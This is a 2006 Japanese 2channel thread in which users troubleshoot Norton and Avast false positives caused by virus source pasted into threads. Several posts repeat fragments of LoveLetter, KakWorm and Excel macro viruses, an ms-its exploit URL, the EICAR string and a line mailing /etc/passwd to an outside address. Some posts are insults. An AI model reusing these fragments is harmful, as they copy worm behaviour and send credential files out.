ノートンがvbsウィルスのソースに誤反応3at PCQA
ノートンがvbsウィルスのソースに誤反応3 - 暇つぶし2ch500:ひよこ名無しさん
06/03/27 01:29:18 l0NeUula.net
Avastですが191の方法でも駄目です。


私だけでもないようです

524 :名無しさん@お腹いっぱい。 :2005/06/11(土) 16:44:33
こんにちは。質問です。

2ちゃんを見てると時々ウイルスが発見されて
スレ自体が見られなくなるんですが、良い解決策があれば教えてください。

2ちゃんブラウザはギコナビ、アンチウイルスはavast!です。
発見されるウイルスはWin32:Mhtplo-26 [Trj]ってのです。

avastの設定の「例外」に
2ちゃんのlogファイルを入れてみたんですがそれでも駄目でした。

501:ひよこ名無しさん
06/03/27 01:29:55 .net
>>494
ウイルス持って逃げろ。

502:ひよこ名無しさん
06/03/27 03:08:39 l0NeUula.net
意味がわかりません

503:ひよこ名無しさん
06/03/27 07:11:47 .net
最近PCが重い!

├ 1.PCを買い換える
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

Regseeker
URLリンク(www.hoverdesk.net)
RegSeeker1.3Beta日本語ファイル
URLリンク(downloads.at.infoseek.co.jp)

504:ひよこ名無しさん
06/03/27 15:04:09 .net
漏れなくシステム破壊の特典あり!!!


505:ひよこ名無しさん
06/03/27 15:18:31 l0NeUula.net
意味がわかりません

506:ひよこ名無しさん
06/03/27 16:03:22 .net
>>494
ここにavastユーザーはあまりこないので
誘導されたこととテンプレをよく読んで
より詳しい環境を添えて↓で聞いてください。
avast! Anti-Virus Part41
スレリンク(sec板)

507:ひよこ名無しさん
06/03/27 22:43:15 l0NeUula.net
最初そちらに書き込もうと思ったのですが
質問できる雰囲気じゃないんです。

508:ひよこ名無しさん
06/03/28 01:04:40 .net
>>501
新スレに移行しましたね。
avast! Anti-Virus Part43
スレリンク(sec板)
>>500にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。

嵐があっても見てくださる人はいます。
チャットではないので即レスは期待しないでくださいね。

邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。

参考に
一般的な質問の仕方
URLリンク(ansitu.xrea.jp)

509:ひよこ名無しさん
06/03/28 14:26:03 YrT7DvdY.net
502さんありがとう。
流れが相変わらず速いので機を見て質問することにします。
次回はNortonだけでなくAvastもスレのタイトルに加えてください。

510:ひよこ名無しさん
06/04/10 20:39:28 x24VBSPG.net


511:ひよこ名無しさん
06/04/10 21:13:51 xObkN9pL.net
Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。
スレリンク(ascii板)
(´・ω・`)ボスケテ
ノートンさんが反応します。




512:ひよこ名無しさん
06/04/10 21:16:42 .net
>>505
キンタマです。

513:ひよこ名無しさん
06/04/10 21:20:28 .net
>506
誤反応ってことですか??


514:ひよこ名無しさん
06/04/10 21:20:58 .net
>>507
トロイです。

515:ひよこ名無しさん
06/04/10 21:21:56 .net
>>508
(´・ω・`)ショボン

516:ひよこ名無しさん
06/04/10 21:23:26 .net
検疫→削除で桶ですか??

517:ひよこ名無しさん
06/04/10 21:25:47 .net
683を除外(´・ω・`)

518:ひよこ名無しさん
06/04/10 21:27:20 .net
>>511
初心者なもので分かりませんorz683とは何ですか?

519:sage
06/04/10 21:58:13 EhjrOlSY.net
テスト

520:ひよこ名無しさん
06/04/10 21:58:27 .net
>>512
キンタマです。

521:ひよこ名無しさん
06/04/10 21:59:34 .net
テスト

522:SAGE
06/04/10 22:01:07 EhjrOlSY.net
テスト

523:ひよこ名無しさん
06/04/10 22:02:04 .net
テスト

524:ひよこ名無しさん
06/04/10 22:03:53 .net
テスト

525:ひよこ名無しさん
06/04/12 21:37:07 oU4WH0fi.net
スレリンク(pachij板)
ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ

をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??

526:ひよこ名無しさん
06/04/12 22:14:11 oU4WH0fi.net
age

527:ひよこ名無しさん
06/04/12 22:35:04 .net
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

528:519
06/04/12 22:53:09 oU4WH0fi.net
他で聞きます。

529:ぴーこ名無しさん
06/04/13 00:07:39 .net
>>519,522
・・・
>>1
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。

また、これとは別にワーム誤反応対策の設定もしてね。
URLリンク(info.2ch.net)
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)

530:ひよこ名無しさん
06/04/15 16:37:44 .net
一昨日くらいからスレが見れなくなった
もちろんログ除外はしてあるのに、ノートン切ると見れる
どうして?ちなみに専ブラはギコナビ

531:ひよこ名無しさん
06/04/15 23:21:55 .net
>>524
誤反応

532:ひよこ名無しさん
06/04/16 09:18:27 .net
>>524
ログ除外以外にもやる事がある
>>1から読め

533:ひよこ名無しさん
06/04/17 20:53:52 Se29R1qE.net
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

<body onload=window()>


534:ひよこ名無しさん
06/04/24 17:37:20 2zoSjqC7.net
にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。

エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。

535:ひよこ名無しさん
06/04/24 20:13:42 .net
ふーん

536:ひよこ名無しさん
06/04/30 18:51:48 .net
>NIS2005の場合(多分NIS2006も同じ)

同じではない件に付いて

537:ぴーこ名無しさん
06/05/01 23:31:23 .net
>>530
kwsk

538:ぴーこ名無しさん
06/05/01 23:32:01 .net
目欄が・・・orz...........

539:ひよこ名無しさん
06/05/04 23:17:25 Gcx9i+9f.net
>>524と同じ症状です。
ここ1週間から出てる。

540:ひよこ名無しさん
06/05/13 05:26:57 w+9rO7hg.net
        , -'"´  ̄`丶、_
           ,.∩         `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_


541:ひよこ名無しさん
06/05/13 09:57:56 .net
        , -'"´  ̄`丶、_
           ,.∩         `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_

542:ひよこ名無しさん
06/05/15 14:24:13 .net
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

543:ひよこ名無しさん
06/05/19 20:06:44 .net
保守age

544:ひよこ名無しさん
06/05/24 01:38:47 uOt5d8a9.net
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか?

545:ひよこ名無しさん
06/05/24 01:40:06 .net



        ___
       /     \     ________
      /   ´`    \  /
     |   ・ ・     | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い
     |   (● ●)  |  \________
     \   ⊂ニ⊃ ノ
       \  ⊂ニ⊃
          ̄ ̄ ̄







546:ぴーこ名無しさん
06/05/24 02:15:51 .net
>>538
スレリンク(software板:12番)
ログフォルダの指定を今一度確認してください。

以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
URLリンク(service1.symantec.com)
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。

547:538
06/05/24 02:24:00 .net
>>540
グミクズがさっさと教えろや

548:538
06/05/24 03:34:43 uOt5d8a9.net
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね

549:538
06/05/24 03:39:57 uOt5d8a9.net
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。

550:ぴーこ名無しさん
06/05/24 04:07:14 .net
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。

注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。

551:ぴーこ名無しさん
06/05/24 04:18:41 .net
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......

参考に
スレリンク(software板:484-番)n dat落ち
URLリンク(220.254.5.211:8000) ミラー

552:538
06/05/24 04:40:48 uOt5d8a9.net
>>545
わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。

553:ひよこ名無しさん
06/05/24 04:47:04 .net
>>546
俺も暇だからよー

554:ひよこ名無しさん
06/05/24 13:46:43 .net
>>546
俺も暇だからよー

555:cen ◆Am9xOgNMYE
06/05/30 02:32:01 .net ?
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。

556:cen ◆Am9xOgNMYE
06/05/30 02:32:51 .net ?
忘れてました。
こちらです。
URLリンク(www.geocities.jp)

557:ひよこ名無しさん
06/05/31 22:57:19 .net
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな

558:ひよこ名無しさん
06/06/01 00:54:09 .net
ダメですた
スレリンク(mnewsplus板:66番)
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな

559:cen ◆Am9xOgNMYE
06/06/01 01:06:54 .net
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。

560:ひよこ名無しさん
06/06/01 01:23:16 .net
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要

561:cen ◆Am9xOgNMYE
06/06/02 01:25:51 .net
こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
URLリンク(www.geocities.jp)

562:ぴーこ名無しさん
06/06/02 02:28:30 .net
>>4のテンプレ案です。
単純に文字参照を抜いてみました。




ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)


■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)

563:ひよこ名無しさん
06/06/02 04:54:27 .net
>>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
 問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
 相変わらず反応する場合があります。

↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。

564:ぴーこ名無しさん
06/06/03 22:00:18 .net
Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
  ノートンが誤検出する置換できないウィルスコードがあるので反応します。

  ノートンがウイルスソースに誤反応の補足
  URLリンク(ansitu.xrea.jp)

ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。

断言できることは、他のWebページでノートンが反応した場合は要注意ということ。


尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)


■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)


>>557
ノシシ
以前の説明をwikiに誘導する形にしてみました。

565:ひよこ名無しさん
06/06/04 10:03:06 .net
u

566:ひよこ名無しさん
06/06/04 10:27:58 .net
保守

567:ひよこ名無しさん
06/06/05 19:23:06 .net
jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのPC初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動&オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
それでも駄目なままです。
他に何をしないといけないんでしょうか?

568:ひよこ名無しさん
06/06/05 19:44:30 .net
ここを読み直せ

569:ひよこ名無しさん
06/06/06 18:14:41 yssu6HWa.net
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblock


570:で侵入感知反応してしまって、 2chの該当IPをアク禁にしてしまってるようなんです。 この場合の対応はどのようにすればよいでしょうか? ノートン切らないと、ログを取得するどころか、 スレ単位、はなはだしくは板単位でアクセスすらできません。



571:ひよこ名無しさん
06/06/06 18:17:44 .net
>>563
リカバリしろデブ。

572:ひよこ名無しさん
06/06/06 18:30:21 .net
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?

573:ぴーこ名無しさん
06/06/07 01:17:37 .net
>>563
URLリンク(mickey.mirv.net)

>>565
URLリンク(ansitu.xrea.jp) の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。

574:ひよこ名無しさん
06/06/07 18:58:51 .net
>>564
リカバリしろデブ。

575:<body onload=window()>
06/06/08 03:34:49 .net
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU

576:ひよこ名無しさん
06/06/08 03:36:10 .net
>568

577:ひよこ名無しさん
06/06/08 04:18:57 .net
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。

これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?

ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。

578:ひよこ名無しさん
06/06/08 04:21:40 .net
570ですが補足です。
表示したスレは
スレリンク(newsplus板)l50
で、ここの>>5にそのソースが書いてありました。

579:ひよこ名無しさん
06/06/08 04:23:53 .net
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?

580:ひよこ名無しさん
06/06/08 04:27:58 .net
>>571
5の最後の行にシリア語書いてあるね

581:ひよこ名無しさん
06/06/08 04:48:56 .net
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ

さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?

582:ひよこ名無しさん
06/06/08 05:11:57 .net
     / ̄ ̄ ̄ ̄ ̄ ̄ ̄\ 
    | ○。         |
    ノノ)            从
   ( i从〓〓      〓〓.从
   .从-=・=-      -=・=-从
  从从.        l       从)
  (从.l∴      ∨     ∴从人)
 (人人|∴ ヽ  .ー===-' ./.∴..从人)  <無職元祖ぶる殿 ◆U/gDqFZzsY蚤
 (人人|∴∴!    ̄   !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)   
 (人人|∴∴!.       !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___       __,二二ヽ〕
 |:::::::::::::::::::::::::ヽ゜   ゜/:::::::::::::::::::::::::/
 〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈 
 |:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/  ノ ~ヽ  ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_~─ー= - | |~~~/

583:ひよこ名無しさん
06/06/12 11:39:57 .net
このスレだと反応しないのは何で?

584:ひよこ名無しさん
06/06/13 14:13:25 .net
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
URLリンク(ansitu.xrea.jp)
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。

エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?


585:ひよこ名無しさん
06/06/13 20:49:00 .net
>>577
きちんと専ブラのログを除外する

586:577
06/06/14 13:32:40 .net
>>578
僕の分かるように1~10までしっかりすべてと教えて下さい。











さっさと、教えろボケこのやろう
               ∧_∧
  ,,,,,,,,,,,,,,,∧,,∧     ( ´∀`) \
~′,,,,,,,,,,ミ,,゚Д゚彡    /  つ℃━━━━━━
  UU""""U U   ~(_つ つ     \へへ_       |
――――――――|         .  |
                        |           |
                        |へ__    .  |
                        |           |
へ____へ__/___へへ__へ______   |
                                   |
                                   |                                   |
                                ((  | ))
                                   |                                   |
                                   |                                 |
                                   |    
                                   |~~~ヽ`∀´>ヾ〕∈



587:ひよこ名無しさん
06/06/17 22:54:14 .net
>>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


588:ひよこ名無しさん
06/06/18 17:52:54 k4PxNBCi.net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))

589:ひよこ名無しさん
06/06/18 18:33:56 .net



590:ひよこ名無しさん
06/06/20 00:04:58 .net
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
これってウイルスに侵されてるのでしょうか?

591:ひよこ名無しさん
06/06/20 01:18:31 .net
             l'vヘ
         ハ ┌( ;/ ト, ,、 rヘ  r'^ナrジ-z
    __}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr~^′
   'っヾ、r'__  |レ'ノ_C'入彳勺ソメろ_j/し-,_
    `フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
     <_ゝし||フぅ(ひzメ__ゝ'l !'そ
        ~zヾ|て 、l レ^ //'| |'~
            | | ヽl| // }|
            | :! || | | ,/ ,'
          | :{. || | |/ /  すいません、ちょっと通りますよ・・・
            l !|| | | /
          ヽ ヽ.|/ //
          _,r)_ j (_,(           ciz
         ,ノこ_- __,ーヽ         ん|Zゥ レz  zjそ_
          }    ...  丿        ろ、,_!|乙7ムLそ/し-z
         ノ""''   一(          `う.l !シ/ア了//_⊂,
        /、__      ヽ         ^'| |~//,/_ソ ハr^
        /    ......     ーl         | |// //ノ
     /~"' 、__/   ,,,...}        |/ ///        _Jv ,、 _,、
      {' _  `y′ 一  /         r'~(_ノ          z'jく|!ぞぅンそ
     人   =/‐-     ハ       丿"  ''(           ぅY||/ソ'/`′
      ヽ '' /  __,,  /       / ‐-  ''')           | レ'//
        '∨     X.        }'''   ....ノ         ノムxく
        j    ー/        /==  ノ'ヽ        rご ー(
       /=‐  r'´-ヽ        }  ー/''''  {        ,ノ'' y' ...)
       ,' _,, 人 ''"`、      ノ.. '' ノ`ヽ ''"ヽ      / ー人.... (
        {ー /  \ -'}     / /    \'''}`     ('' ィ´   \_ヽ
      ハ  〈      )八     ( f       )ハ.     )ノ      _)ノ
       ヽ )   ((        )ノ      /      ー'′

592:dirsystem&"\MSKernel32.vbs
06/06/20 01:55:47 .net
>>568


593:あぼ~ん
06/06/20 01:56:38 .net
>>568 >>585


594:ひよこ名無しさん
06/06/20 02:15:03 .net
>>583
シリア語ブラクラ
これを使うといい。
URLリンク(www.geocities.jp)

595:ひよこ名無しさん
06/06/20 23:24:54 .net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

596:ひよこ名無しさん
06/06/21 12:18:24 nQsDrOZ+.net
このスレに貼ってあるソースは大丈夫なのですか?
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか?

597:ひよこ名無しさん
06/06/21 14:23:42 fhcCUte2.net
テスト

598:ひよこ名無しさん
06/06/21 20:24:45 .net
>>589
心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)

599:ひよこ名無しさん。
06/06/21 23:50:37 .net
NGワードあぼ~んすればおk

600:ひよこ名無しさん
06/06/22 20:26:16 l9A+tZtH.net
誘導されてきました

